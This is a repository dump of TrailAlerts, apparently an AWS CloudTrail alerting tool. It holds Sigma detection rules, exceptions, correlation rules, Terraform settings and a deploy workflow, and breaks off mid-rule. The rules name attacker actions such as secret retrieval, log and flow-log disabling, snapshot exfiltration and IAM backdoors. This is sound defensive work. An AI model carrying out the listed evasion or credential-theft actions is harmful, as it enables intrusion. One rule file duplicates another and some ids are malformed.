├── images ├── features.png ├── TrailAlerts.png ├── TrailAlerts-Infra.PNG └── TrailAlerts-VPNAPI.PNG ├── rules ├── exceptions.json ├── postprocessing_rules │ └── sample_rules.json └── sigma_rules │ ├── aws_cloudtrail_create_iam.yml │ ├── aws_secretsmanager_getsecrets.yml │ ├── aws_secretsmanager_batchgetsecretvalue.yml │ ├── aws_cloudtrail_attachpolicy.yml │ ├── aws_snapshot_backup_exfiltration.yml │ ├── aws_config_disable_recording.yml │ ├── aws_cloudtrail_new_route_added.yml │ ├── aws_cloudtrail_disable_logging.yml │ ├── aws_delete_identity.yml │ ├── aws_root_account_usage.yml │ ├── aws_disable_bucket_versioning.yml │ ├── aws_guardduty_disruption.yml │ ├── aws_rds_public_db_restore.yml │ ├── aws_efs_fileshare_mount_modified_or_deleted.yml │ ├── aws_cloudtrail_new_acl_entries.yml │ ├── aws_rds_change_master_password.yml │ ├── aws_ec2_deleteflowlogs.yml │ ├── aws_efs_fileshare_modified_or_deleted.yml │ ├── aws_iam_s3browser_user_or_accesskey_creation.yml │ ├── aws_ec2_getpassworddate.yml │ ├── aws_organizations_leaveorganization.yml │ ├── aws_cloudtrail_puteventselectors.yml │ ├── aws_securityhub_finding_evasion.yml │ ├── aws_route53resolver_deleteresolver.yml │ ├── aws_ec2_disable_encryption.yml │ ├── aws_ec2_startup_script_change.yml │ ├── aws_iam_s3browser_loginprofile_creation.yml │ ├── aws_cloudtrail_ssm_malicious_usage.yml │ ├── aws_update_login_profile.yml │ ├── aws_eks_cluster_created_or_deleted.yml │ ├── aws_ssm_ssmgetparameter.yml │ ├── aws_s3_lifecycle.yml │ ├── aws_enum_buckets.yml │ ├── aws_passed_role_to_glue_development_endpoint.yml │ ├── aws_elasticache_security_group_created.yml │ ├── aws_ec2_import_key_pair_activity.yml │ ├── aws_cloudtrail_security_group_change_rds.yml │ ├── aws_rds_dbcluster_actions.yml │ ├── aws_cloudtrail_security_group_change_loadbalancer.yml │ ├── aws_route_53_domain_transferred_to_another_account.yml │ ├── aws_sts_getsessiontoken_misuse.yml │ ├── aws_iam_backdoor_users_keys.yml │ ├── aws_new_lambda_layer_attached.yml │ ├── aws_sso_idp_change.yml │ ├── aws_cloudtrail_security_group_change_ingress_egress.yml │ ├── aws_delete_saml_provider.yml │ ├── aws_elasticache_security_group_modified_or_deleted.yml │ ├── aws_susp_saml_activity.yml │ ├── aws_route_53_domain_transferred_lock_disabled.yml │ ├── aws_console_getsignintoken.yml │ ├── aws_lambda_function_url.yml │ ├── aws_s3_data_management_tampering.yml │ ├── aws_update_login_profile_tests.json │ ├── aws_iam_backdoor_users_keys_tests.json │ ├── aws_enum_buckets_tests.json │ ├── aws_cloudtrail_create_iam_tests.json │ ├── aws_delete_identity_tests.json │ ├── aws_ssm_ssmgetparameter_tests.json │ ├── aws_cloudtrail_disable_logging_tests.json │ ├── aws_cloudtrail_new_route_added_tests.json │ ├── aws_ec2_deleteflowlogs_tests.json │ ├── aws_guardduty_disruption_tests.json │ ├── aws_ec2_getpassworddate_tests.json │ ├── aws_rds_dbcluster_actions_tests.json │ ├── aws_sts_getsessiontoken_misuse_tests.json │ ├── aws_cloudtrail_attachpolicy_tests.json │ ├── aws_ec2_import_key_pair_activity_tests.json │ ├── aws_eks_cluster_created_or_deleted_tests.json │ ├── aws_cloudtrail_puteventselectors_tests.json │ ├── aws_s3_data_management_tampering_tests.json │ ├── aws_sso_idp_change_tests.json │ ├── aws_cloudtrail_new_acl_entries_tests.json │ ├── aws_lambda_function_url_tests.json │ ├── aws_secretsmanager_getsecrets_tests.json │ ├── aws_secretsmanager_batchgetsecretvalue_tests.json │ ├── aws_securityhub_finding_evasion_tests.json │ ├── aws_organizations_leaveorganization_tests.json │ ├── aws_passed_role_to_glue_development_endpoint_tests.json │ ├── aws_snapshot_backup_exfiltration_tests.json │ ├── aws_ec2_disable_encryption_tests.json │ ├── aws_efs_fileshare_modified_or_deleted_tests.json │ ├── aws_efs_fileshare_mount_modified_or_deleted_tests.json │ ├── aws_elasticache_security_group_created_tests.json │ ├── aws_cloudtrail_security_group_change_rds_tests.json │ ├── aws_route53resolver_deleteresolver_tests.json │ ├── aws_route_53_domain_transferred_lock_disabled_tests.json │ ├── aws_cloudtrail_security_group_change_ingress_egress_tests.json │ ├── aws_elasticache_security_group_modified_or_deleted_tests.json │ ├── aws_root_account_usage_tests.json │ ├── aws_route_53_domain_transferred_to_another_account_tests.json │ ├── aws_cloudtrail_security_group_change_loadbalancer_tests.json │ ├── aws_delete_saml_provider_tests.json │ ├── aws_disable_bucket_versioning_tests.json │ ├── aws_console_getsignintoken_tests.json │ ├── aws_config_disable_recording_tests.json │ ├── aws_ec2_startup_script_change_tests.json │ ├── aws_rds_public_db_restore_tests.json │ ├── aws_s3_lifecycle_tests.json │ ├── aws_cloudtrail_ssm_malicious_usage_tests.json │ ├── aws_rds_change_master_password_tests.json │ └── aws_new_lambda_layer_attached_tests.json ├── terraform ├── terraform.tfvars.json ├── main.tf ├── variables.tf └── migrate.tf ├── utils └── github_oidc.tf ├── .github └── workflows │ └── deploy-rules.yml └── .gitignore /images/features.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/adanalvarez/TrailAlerts/HEAD/images/features.png -------------------------------------------------------------------------------- /images/TrailAlerts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/adanalvarez/TrailAlerts/HEAD/images/TrailAlerts.png -------------------------------------------------------------------------------- /images/TrailAlerts-Infra.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/adanalvarez/TrailAlerts/HEAD/images/TrailAlerts-Infra.PNG -------------------------------------------------------------------------------- /images/TrailAlerts-VPNAPI.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/adanalvarez/TrailAlerts/HEAD/images/TrailAlerts-VPNAPI.PNG -------------------------------------------------------------------------------- /rules/exceptions.json: -------------------------------------------------------------------------------- 1 | { 2 | "AWS SecretsManager GetSecretValue":{ 3 | "excludedActors":["arn:aws:iam::123456789012:user/ci-bot","arn:aws:iam::123456789012:role/app-sync"], 4 | "excludedSourceIPs":["10.0.1.100"], 5 | "excludedActorsRegex":[".*AWSReservedSSO_AdministratorAccess.*"] 6 | }, 7 | "AWS Console Login":{ 8 | "excludedActors":["arn:aws:iam::123456789012:user/monitoring"] 9 | } 10 | } -------------------------------------------------------------------------------- /terraform/terraform.tfvars.json: -------------------------------------------------------------------------------- 1 | { 2 | "aws_region": "us-east-1", 3 | "email_endpoint": "mail@mail.com", 4 | "create_cloudtrail": false, 5 | "existing_cloudtrail_bucket_name": "aws-cloudtrail-logs-123123123123-fffffffffff", 6 | "enable_sns": false, 7 | "source_email": "mail@mail.com", 8 | "ses_identities": ["mail@mail.com"], 9 | "correlation_enabled": true, 10 | "environment": "dev", 11 | "cloudwatch_logs_retention_days": 30, 12 | "notification_cooldown_minutes": 5 13 | } -------------------------------------------------------------------------------- /utils/github_oidc.tf: -------------------------------------------------------------------------------- 1 | provider "aws" { 2 | region = "us-east-1" 3 | } 4 | 5 | module "github-oidc" { 6 | source = "github.com/terraform-module/terraform-aws-github-oidc-provider?ref=8ca02cd8c2264d1302cad85683411543d2f01bea" # v2.2.1 7 | 8 | role_name = "TrailAlertsGitHubActionsRole" 9 | create_oidc_provider = true 10 | create_oidc_role = true 11 | 12 | repositories = ["adanalvarez/trailalerts-alpha"] # Change this to your GitHub repository 13 | oidc_role_attach_policies = ["arn:aws:iam::aws:policy/AdministratorAccess"] # Change this to the policies you want to attach 14 | } -------------------------------------------------------------------------------- /rules/postprocessing_rules/sample_rules.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "type": "correlation", 4 | "sigmaRuleTitle": "AWS CloudTrail Attach Policy", 5 | "lookFor": "AWS CloudTrail IAM User Creation", 6 | "windowMinutes": 15, 7 | "severity_adjustment": "high", 8 | "description": "User creation followed by policy attachment" 9 | }, 10 | { 11 | "type": "threshold", 12 | "sigmaRuleTitle": "AWS SecretsManager GetSecretValue", 13 | "thresholdCount": 10, 14 | "windowMinutes": 5, 15 | "severity_adjustment": "medium", 16 | "description": "Multiple SecretsManager accesses by same actor in short time window" 17 | } 18 | ] -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_create_iam.yml: -------------------------------------------------------------------------------- 1 | title: AWS CloudTrail IAM User Creation 2 | id: 4f60cc0-36fb-42b7-9b58-a5b53019fb74 3 | status: test 4 | description: Detects creation of an IAM user 5 | references: 6 | - https://traildiscover.cloud/#IAM-CreateUser 7 | author: adanalvarez 8 | date: 2025-03-30 9 | modified: 2025-03-30 10 | tags: 11 | - attack.persistence 12 | - attack.t1078 13 | logsource: 14 | product: aws 15 | service: iam 16 | detection: 17 | selection_source: 18 | eventSource: iam.amazonaws.com 19 | eventName: 20 | - CreateUser 21 | condition: selection_source 22 | falsepositives: 23 | - Valid IAM user creation 24 | level: medium -------------------------------------------------------------------------------- /rules/sigma_rules/aws_secretsmanager_getsecrets.yml: -------------------------------------------------------------------------------- 1 | title: AWS SecretsManager GetSecretValue 2 | id: 4a60ff0-36fb-42b7-9b58-a5b53019fb74 3 | status: test 4 | description: Detects GetSecretValue in AWS Secrets Manager 5 | references: 6 | - https://traildiscover.cloud/#GetSecretValue 7 | author: adanalvarez 8 | date: 2025-03-30 9 | modified: 2025-03-30 10 | tags: 11 | - attack.credential_access 12 | - attack.t1552 13 | logsource: 14 | product: aws 15 | service: secretsmanager 16 | detection: 17 | selection_source: 18 | eventSource: secretsmanager.amazonaws.com 19 | eventName: 20 | - GetSecretValue 21 | condition: selection_source 22 | falsepositives: 23 | - Valid GetSecretValue 24 | level: low -------------------------------------------------------------------------------- /rules/sigma_rules/aws_secretsmanager_batchgetsecretvalue.yml: -------------------------------------------------------------------------------- 1 | title: AWS SecretsManager GetSecretValue 2 | id: 4a60ff0-36fb-42b7-9b58-a5b53019fb74 3 | status: test 4 | description: Detects GetSecretValue in AWS Secrets Manager 5 | references: 6 | - https://traildiscover.cloud/#GetSecretValue 7 | author: adanalvarez 8 | date: 2025-03-30 9 | modified: 2025-03-30 10 | tags: 11 | - attack.credential_access 12 | - attack.t1552 13 | logsource: 14 | product: aws 15 | service: secretsmanager 16 | detection: 17 | selection_source: 18 | eventSource: secretsmanager.amazonaws.com 19 | eventName: 20 | - GetSecretValue 21 | condition: selection_source 22 | falsepositives: 23 | - Valid GetSecretValue 24 | level: low -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_attachpolicy.yml: -------------------------------------------------------------------------------- 1 | title: AWS CloudTrail Attach Policy 2 | id: 4f60cc0-36fb-42b7-9b58-a5b53019fb74 3 | status: test 4 | description: Detects attaching a policy to an IAM user 5 | references: 6 | - https://traildiscover.cloud/#IAM-AttachPolicy 7 | author: adanalvarez 8 | date: 2025-03-30 9 | modified: 2025-03-30 10 | tags: 11 | - attack.persistence 12 | - attack.t1078 13 | logsource: 14 | product: aws 15 | service: iam 16 | detection: 17 | selection_source: 18 | eventSource: iam.amazonaws.com 19 | eventName: 20 | - AttachUserPolicy 21 | - AttachGroupPolicy 22 | - AttachRolePolicy 23 | condition: selection_source 24 | falsepositives: 25 | - Valid IAM user creation 26 | level: medium -------------------------------------------------------------------------------- /rules/sigma_rules/aws_snapshot_backup_exfiltration.yml: -------------------------------------------------------------------------------- 1 | title: AWS Snapshot Backup Exfiltration 2 | id: abae8fec-57bd-4f87-aff6-6e3db989843d 3 | status: test 4 | description: Detects the modification of an EC2 snapshot's permissions to enable access from another account 5 | references: 6 | - https://www.justice.gov/file/1080281/download 7 | author: Darin Smith 8 | date: 2021-05-17 9 | modified: 2021-08-19 10 | tags: 11 | - attack.exfiltration 12 | - attack.t1537 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_source: 18 | eventSource: ec2.amazonaws.com 19 | eventName: ModifySnapshotAttribute 20 | condition: selection_source 21 | falsepositives: 22 | - Valid change to a snapshot's permissions 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_config_disable_recording.yml: -------------------------------------------------------------------------------- 1 | title: AWS Config Disabling Channel/Recorder 2 | id: 07330162-dba1-4746-8121-a9647d49d297 3 | status: test 4 | description: Detects AWS Config Service disabling 5 | references: 6 | - https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html 7 | author: vitaliy0x1 8 | date: 2020-01-21 9 | modified: 2022-10-09 10 | tags: 11 | - attack.defense-evasion 12 | - attack.t1562.001 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: 'config.amazonaws.com' 19 | eventName: 20 | - 'DeleteDeliveryChannel' 21 | - 'StopConfigurationRecorder' 22 | condition: selection 23 | falsepositives: 24 | - Valid change in AWS Config Service 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_new_route_added.yml: -------------------------------------------------------------------------------- 1 | title: New Network Route Added 2 | id: c803b2ce-c4a2-4836-beae-b112010390b1 3 | status: test 4 | description: | 5 | Detects the addition of a new network route to a route table in AWS. 6 | references: 7 | - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ 8 | author: jamesc-grafana 9 | date: 2024-07-11 10 | tags: 11 | - attack.initial-access 12 | - attack.t1190 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: 'ec2.amazonaws.com' 19 | eventName: 'CreateRoute' 20 | condition: selection 21 | falsepositives: 22 | - New VPC Creation requiring setup of a new route table 23 | - New subnets added requiring routing setup 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_disable_logging.yml: -------------------------------------------------------------------------------- 1 | title: AWS CloudTrail Important Change 2 | id: 4db60cc0-36fb-42b7-9b58-a5b53019fb74 3 | status: test 4 | description: Detects disabling, deleting and updating of a Trail 5 | references: 6 | - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html 7 | author: vitaliy0x1 8 | date: 2020-01-21 9 | modified: 2022-10-09 10 | tags: 11 | - attack.defense-evasion 12 | - attack.t1562.001 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_source: 18 | eventSource: cloudtrail.amazonaws.com 19 | eventName: 20 | - StopLogging 21 | - UpdateTrail 22 | - DeleteTrail 23 | condition: selection_source 24 | falsepositives: 25 | - Valid change in a Trail 26 | level: medium 27 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_delete_identity.yml: -------------------------------------------------------------------------------- 1 | title: SES Identity Has Been Deleted 2 | id: 20f754db-d025-4a8f-9d74-e0037e999a9a 3 | status: test 4 | description: Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities 5 | references: 6 | - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ 7 | author: Janantha Marasinghe 8 | date: 2022-12-13 9 | modified: 2022-12-28 10 | tags: 11 | - attack.defense-evasion 12 | - attack.t1070 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: 'ses.amazonaws.com' 19 | eventName: 'DeleteIdentity' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_root_account_usage.yml: -------------------------------------------------------------------------------- 1 | title: AWS Root Credentials 2 | id: 8ad1600d-e9dc-4251-b0ee-a65268f29add 3 | status: test 4 | description: Detects AWS root account usage 5 | references: 6 | - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html 7 | author: vitaliy0x1 8 | date: 2020-01-21 9 | modified: 2022-10-09 10 | tags: 11 | - attack.privilege-escalation 12 | - attack.t1078.004 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_usertype: 18 | userIdentity.type: Root 19 | selection_eventtype: 20 | eventType: AwsServiceEvent 21 | condition: selection_usertype and not selection_eventtype 22 | falsepositives: 23 | - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_disable_bucket_versioning.yml: -------------------------------------------------------------------------------- 1 | title: AWS S3 Bucket Versioning Disable 2 | id: a136ac98-b2bc-4189-a14d-f0d0388e57a7 3 | status: test 4 | description: Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects. 5 | references: 6 | - https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82 7 | author: Sean Johnstone | Unit 42 8 | date: 2023-10-28 9 | tags: 10 | - attack.impact 11 | - attack.t1490 12 | logsource: 13 | product: aws 14 | service: cloudtrail 15 | detection: 16 | selection: 17 | eventSource: s3.amazonaws.com 18 | eventName: PutBucketVersioning 19 | requestParameters|contains: 'Suspended' 20 | condition: selection 21 | falsepositives: 22 | - AWS administrator legitimately disabling bucket versioning 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_guardduty_disruption.yml: -------------------------------------------------------------------------------- 1 | title: AWS GuardDuty Important Change 2 | id: 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3 3 | status: test 4 | description: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. 5 | references: 6 | - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9 7 | author: faloker 8 | date: 2020-02-11 9 | modified: 2022-10-09 10 | tags: 11 | - attack.defense-evasion 12 | - attack.t1562.001 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_source: 18 | eventSource: guardduty.amazonaws.com 19 | eventName: CreateIPSet 20 | condition: selection_source 21 | falsepositives: 22 | - Valid change in the GuardDuty (e.g. to ignore internal scanners) 23 | level: high 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_public_db_restore.yml: -------------------------------------------------------------------------------- 1 | title: Restore Public AWS RDS Instance 2 | id: c3f265c7-ff03-4056-8ab2-d486227b4599 3 | status: test 4 | description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. 5 | references: 6 | - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py 7 | author: faloker 8 | date: 2020-02-12 9 | modified: 2022-10-09 10 | tags: 11 | - attack.exfiltration 12 | - attack.t1020 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_source: 18 | eventSource: rds.amazonaws.com 19 | responseElements.publiclyAccessible: 'true' 20 | eventName: RestoreDBInstanceFromDBSnapshot 21 | condition: selection_source 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_efs_fileshare_mount_modified_or_deleted.yml: -------------------------------------------------------------------------------- 1 | title: AWS EFS Fileshare Mount Modified or Deleted 2 | id: 6a7ba45c-63d8-473e-9736-2eaabff79964 3 | status: test 4 | description: Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. 5 | references: 6 | - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html 7 | author: Austin Songer @austinsonger 8 | date: 2021-08-15 9 | modified: 2022-10-09 10 | tags: 11 | - attack.impact 12 | - attack.t1485 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: elasticfilesystem.amazonaws.com 19 | eventName: DeleteMountTarget 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_new_acl_entries.yml: -------------------------------------------------------------------------------- 1 | title: New Network ACL Entry Added 2 | id: e1f7febb-7b94-4234-b5c6-00fb8500f5dd 3 | status: test 4 | description: | 5 | Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account. 6 | references: 7 | - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ 8 | author: jamesc-grafana 9 | date: 2024-07-11 10 | tags: 11 | - attack.initial-access 12 | - attack.t1190 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: 'ec2.amazonaws.com' 19 | eventName: 'CreateNetworkAclEntry' 20 | condition: selection 21 | falsepositives: 22 | - Legitimate use of ACLs to enable customer and staff access from the public internet into a public VPC 23 | level: low 24 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_change_master_password.yml: -------------------------------------------------------------------------------- 1 | title: AWS RDS Master Password Change 2 | id: 8a63cdd4-6207-414a-85bc-7e032bd3c1a2 3 | status: test 4 | description: Detects the change of database master password. It may be a part of data exfiltration. 5 | references: 6 | - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py 7 | author: faloker 8 | date: 2020-02-12 9 | modified: 2022-10-05 10 | tags: 11 | - attack.exfiltration 12 | - attack.t1020 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection_source: 18 | eventSource: rds.amazonaws.com 19 | responseElements.pendingModifiedValues.masterUserPassword|contains: '*' 20 | eventName: ModifyDBInstance 21 | condition: selection_source 22 | falsepositives: 23 | - Benign changes to a db instance 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_deleteflowlogs.yml: -------------------------------------------------------------------------------- 1 | title: AWS EC2 DeleteFlowLogs API Call 2 | id: 7b8c9d0e-1f2a-3b4c-5d6e-7f8g9h0i1j2k 3 | status: test 4 | description: Detects usage of the DeleteFlowLogs API call, which removes VPC Flow Logs and can hinder network traffic monitoring. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/ 7 | - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html 8 | author: adanalvarez 9 | date: 2025-04-12 10 | modified: 2025-04-12 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.002 14 | logsource: 15 | product: aws 16 | service: ec2 17 | category: management 18 | detection: 19 | selection: 20 | eventSource: ec2.amazonaws.com 21 | eventName: DeleteFlowLogs 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrative actions removing obsolete VPC Flow Logs 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_efs_fileshare_modified_or_deleted.yml: -------------------------------------------------------------------------------- 1 | title: AWS EFS Fileshare Modified or Deleted 2 | id: 25cb1ba1-8a19-4a23-a198-d252664c8cef 3 | status: test 4 | description: | 5 | Detects when a EFS Fileshare is modified or deleted. 6 | You can't delete a file system that is in use. 7 | If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. 8 | references: 9 | - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html 10 | author: Austin Songer @austinsonger 11 | date: 2021-08-15 12 | modified: 2022-10-09 13 | tags: 14 | - attack.impact 15 | logsource: 16 | product: aws 17 | service: cloudtrail 18 | detection: 19 | selection: 20 | eventSource: elasticfilesystem.amazonaws.com 21 | eventName: DeleteFileSystem 22 | condition: selection 23 | falsepositives: 24 | - Unknown 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_iam_s3browser_user_or_accesskey_creation.yml: -------------------------------------------------------------------------------- 1 | title: AWS IAM S3Browser User or AccessKey Creation 2 | id: db014773-d9d9-4792-91e5-133337c0ffee 3 | status: test 4 | description: Detects S3 Browser utility creating IAM User or AccessKey. 5 | references: 6 | - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor 7 | author: daniel.bohannon@permiso.io (@danielhbohannon) 8 | date: 2023-05-17 9 | tags: 10 | - attack.execution 11 | - attack.persistence 12 | - attack.t1059.009 13 | - attack.t1078.004 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: 'iam.amazonaws.com' 20 | eventName: 21 | - 'CreateUser' 22 | - 'CreateAccessKey' 23 | userAgent|contains: 'S3 Browser' 24 | condition: selection 25 | falsepositives: 26 | - Valid usage of S3 Browser for IAM User and/or AccessKey creation 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_getpassworddate.yml: -------------------------------------------------------------------------------- 1 | title: AWS EC2 GetPasswordData API Call 2 | id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d 3 | status: test 4 | description: Detects usage of the GetPasswordData API call, which retrieves the encrypted administrator password for a Windows EC2 instance. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/ 7 | - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_GetPasswordData.html 8 | - https://traildiscover.cloud/#EC2-GetPasswordData 9 | author: adanalvarez 10 | date: 2025-04-12 11 | modified: 2025-04-12 12 | tags: 13 | - attack.credential_access 14 | - attack.t1552 15 | logsource: 16 | product: aws 17 | service: ec2 18 | detection: 19 | selection: 20 | eventSource: ec2.amazonaws.com 21 | eventName: GetPasswordData 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrative actions retrieving Windows EC2 instance passwords 25 | level: medium 26 | -------------------------------------------------------------------------------- /.github/workflows/deploy-rules.yml: -------------------------------------------------------------------------------- 1 | name: Deploy new rules to TrailAlerts S3 2 | 3 | 4 | on: 5 | push: 6 | branches: [ main ] 7 | paths: 8 | - 'rules/**' 9 | workflow_dispatch: 10 | 11 | permissions: 12 | id-token: write 13 | contents: read 14 | 15 | jobs: 16 | deploy-rules: 17 | runs-on: ubuntu-latest 18 | 19 | env: 20 | AWS_ACCOUNT_ID: ${{ secrets.AWS_ACCOUNT_ID }} 21 | 22 | steps: 23 | - uses: actions/checkout@v4 24 | 25 | - name: Login to AWS 26 | uses: aws-actions/configure-aws-credentials@v4 27 | with: 28 | aws-region: us-east-1 29 | role-to-assume: arn:aws:iam::${{ env.AWS_ACCOUNT_ID }}:role/TrailAlertsGitHubActionsRole 30 | role-session-name: TrailAlertsGitHubActionsSession 31 | role-duration-seconds: 900 32 | 33 | - name: Upload rules to S3 34 | run: | 35 | aws s3 cp rules/ s3://trailalerts-rules-${{ env.AWS_ACCOUNT_ID }}/ --recursive 36 | echo "Rules uploaded to S3 bucket." -------------------------------------------------------------------------------- /rules/sigma_rules/aws_organizations_leaveorganization.yml: -------------------------------------------------------------------------------- 1 | title: AWS Organizations LeaveOrganization API Call 2 | id: 6a7b8c9d-0e1f-2a3b-4c5d-6e7f8g9h0i1j 3 | status: test 4 | description: Detects usage of the LeaveOrganization API call, which removes a member account from its parent AWS Organization. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.organizations-leave/ 7 | - https://docs.aws.amazon.com/organizations/latest/APIReference/API_LeaveOrganization.html 8 | author: adanalvarez 9 | date: 2025-04-12 10 | modified: 2025-04-12 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.001 14 | logsource: 15 | product: aws 16 | service: organizations 17 | category: management 18 | detection: 19 | selection: 20 | eventSource: organizations.amazonaws.com 21 | eventName: LeaveOrganization 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrative actions removing an account from an organization 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_puteventselectors.yml: -------------------------------------------------------------------------------- 1 | title: AWS CloudTrail PutEventSelectors with includeManagementEvents Disabled 2 | id: e7f3c2d1-4b5a-6c7d-8e9f-0a1b2c3d4e5f 3 | status: test 4 | description: Detects usage of the PutEventSelectors API call with includeManagementEvents set to false, which disables logging of management events in AWS CloudTrail. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/ 7 | - https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_PutEventSelectors.html 8 | author: adanalvarez 9 | date: 2025-04-12 10 | modified: 2025-04-12 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.002 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: cloudtrail.amazonaws.com 20 | eventName: PutEventSelectors 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administrative actions modifying event selectors 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_securityhub_finding_evasion.yml: -------------------------------------------------------------------------------- 1 | title: AWS SecurityHub Findings Evasion 2 | id: a607e1fe-74bf-4440-a3ec-b059b9103157 3 | status: stable 4 | description: Detects the modification of the findings on SecurityHub. 5 | references: 6 | - https://docs.aws.amazon.com/cli/latest/reference/securityhub/ 7 | author: Sittikorn S 8 | date: 2021-06-28 9 | tags: 10 | - attack.defense-evasion 11 | - attack.t1562 12 | logsource: 13 | product: aws 14 | service: cloudtrail 15 | detection: 16 | selection: 17 | eventSource: securityhub.amazonaws.com 18 | eventName: 19 | - 'BatchUpdateFindings' 20 | - 'DeleteInsight' 21 | - 'UpdateFindings' 22 | - 'UpdateInsight' 23 | condition: selection 24 | fields: 25 | - sourceIPAddress 26 | - userIdentity.arn 27 | falsepositives: 28 | - System or Network administrator behaviors 29 | - DEV, UAT, SAT environment. You should apply this rule with PROD environment only. 30 | level: high 31 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route53resolver_deleteresolver.yml: -------------------------------------------------------------------------------- 1 | title: AWS Route 53 Resolver Query Log Configuration Deletion 2 | id: 5f6e7d8c-9b0a-1c2d-3e4f-5a6b7c8d9e0f 3 | status: test 4 | description: Detects deletion of Route 